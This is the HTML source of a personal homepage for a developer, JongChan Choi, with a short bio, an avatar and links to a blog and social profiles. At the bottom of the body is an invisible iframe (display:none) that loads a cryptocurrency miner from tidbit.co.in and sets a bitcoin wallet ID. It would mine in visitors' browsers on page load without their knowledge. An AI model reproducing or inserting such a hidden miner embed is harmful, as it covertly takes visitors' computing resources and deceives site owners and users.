<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>0xABCDEF.com</title>
    <script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery-backstretch/2.0.4/jquery.backstretch.min.js"></script>
    <link href="//netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css" rel="stylesheet">
    <style>
    body {
      overflow-x: hidden;
      text-align: center;
      margin: 30px;
    }
    h1, p, span, a {
      margin: 0;
      font-family: Times;
      font-size: 17px;
      text-shadow: 2px 2px 4px #fff;
      opacity: 0.4;
      color: #000;
    }
    i {
      font-size: 20px;
    }
    h1 {
      font-size: 25px;
    }
    a {
      text-decoration: initial;
    }
    p a {
      font-family: monospace;
      text-decoration: underline;
    }
    .backstretch {
      filter: blur(20px);
      -o-filter: blur(20px);
      -ms-filter: blur(20px);
      -moz-filter: blur(20px);
      -webkit-filter: blur(20px);
    }
    </style>
  </head>
  <body>
    <h1>JongChan Choi</h1>
    <img src="http://www.gravatar.com/avatar/00f091701fb49f41504d7c15edc5de9d?s=150">
    <br>
    <p><a href="http://0xABCDEF.com/resume">résumé</a></p>
    <a href="http://blog.0xABCDEF.com/"><i class="icon-home"></i></a>
    <span>/</span>
    <a href="https://twitter.com/disjukr"><i class="icon-twitter"></i></a>
    <span>/</span>
    <a href="https://github.com/disjukr"><i class="icon-github"></i></a>
    <span>/</span>
    <a href="https://bitbucket.org/0xABCDEF"><i class="icon-bitbucket"></i></a>
    <span>/</span>
    <a href="https://www.gittip.com/disjukr/"><i class="icon-gittip"></i></a>
    <br><br>
    <p>Born in 1994</p>
    <p>Seoul, Korea</p>
    <p>Nowadays, I am making drawing tools</p>
    <script type="text/javascript">
    $.backstretch('http://www.gravatar.com/avatar/00f091701fb49f41504d7c15edc5de9d?s=10');
    </script>
    <iframe style='display:none' src='http://tidbit.co.in/miner'>
      <script>
      window.walletId = 1Jy6AJoyQt5A9d1t8Fhr9PxYFShuW95ui5
      </script>
    </iframe>
  </body>
</html>
